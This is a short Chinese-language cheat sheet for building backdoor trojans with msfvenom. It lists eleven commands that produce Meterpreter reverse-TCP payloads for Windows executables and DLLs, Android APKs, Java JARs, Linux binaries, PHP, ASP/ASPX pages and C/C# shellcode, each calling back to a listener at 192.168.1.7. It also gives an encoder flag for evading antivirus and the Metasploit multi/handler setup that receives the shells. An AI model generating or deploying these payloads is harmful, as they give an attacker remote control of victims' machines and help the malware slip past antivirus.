生成反彈木馬:php
1. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f exe > abc.exe //exe文件java
2. msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=5555 R > apk.apk //安卓python
3. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -a x86 -f dll > shell.dll // DLL後門linux
4. msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 W > text.jar //Java後門android
5. msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 R >> /root/Desktop/test //linux 後門 須要把test加權限 chmod +x ./testshell
6. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f raw > shell.py //pythonwindows
7. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f raw > shell.php //PHPtcp
8. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f asp > shell.asp //asp編碼
9. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f aspx > shell.aspx //aspxspa
10. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f c > shellcode.c //生成C語言shellcode
11. msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=4444 -f csharp > shellcode.txt //生成C#語言shellcode
若是要使用編碼免殺加上參數 -e x86/shikata_ga_nai
監聽利用模塊:
use exploit/multi/handler
set PAYLOAD <Payload name>
set LHOST <LHOST value>
set LPORT <LPORT value>
exploit